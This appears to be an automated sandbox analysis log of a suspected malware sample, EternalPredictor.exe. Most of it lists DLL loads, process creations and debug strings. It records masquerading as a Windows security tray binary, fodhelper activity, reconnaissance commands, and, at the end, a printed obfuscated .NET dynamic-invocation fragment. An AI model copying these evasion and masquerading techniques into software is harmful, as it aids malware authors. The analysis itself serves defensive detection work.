                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: samlib.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\consent.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\consent.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
                        Source: EternalPredictor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: EternalPredictor.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: EternalPredictor.exeStatic file information: File size 18412032 > 1048576
                        Source: EternalPredictor.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x118e800
                        Source: EternalPredictor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdb source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                        Source: Binary string: .pdb/ source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000008.00000002.1950555246.00007FFBA6512000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/? source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbl source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000008.00000002.1955863036.00007FFBBC341000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000008.00000002.1954782727.00007FFBAB971000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, program.exe, 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbN0uP source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000008.00000002.1955626688.00007FFBBC151000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000008.00000002.1955177805.00007FFBBAF31000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb63 source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdbhP source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, program.exe, 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, 00000008.00000002.1954529831.00007FFBAB941000.00000040.00000001.01000000.00000010.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: eternal.exe.0.dr, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.U2xZS9Ii0bNLwN14STRo7hwBRPZhfM0aicc7EKEBlrFHxeDFy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.klGcTAcrhqPTSR6ORizJ2c7HcRMpsdc3i6nBTyBWta4vxEDVy,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.e1a4iS5m2cwY7Wz4tf9JJh8YkbpTv1LUNuS5AGzigkLRqkULl,LGrh1xeznUsOqYjAKG6NV80aR9CC8J3FhBQD7qBRvte9ULxnP.zddVe2zadHhHeDck7teLRxIVYabLIJuFmKSkvkzjoYfQwS95L,z7GL3GcSz0bU9xxBylPHvbaUX8.BvRcOGTXZLhNVW8VvUiYmleWf3IvqmgfkWjeLSwSzGNWB3uGR2J9VQkAvHh()}}, (string[])null, (Type[])null, (bool[])null, true)
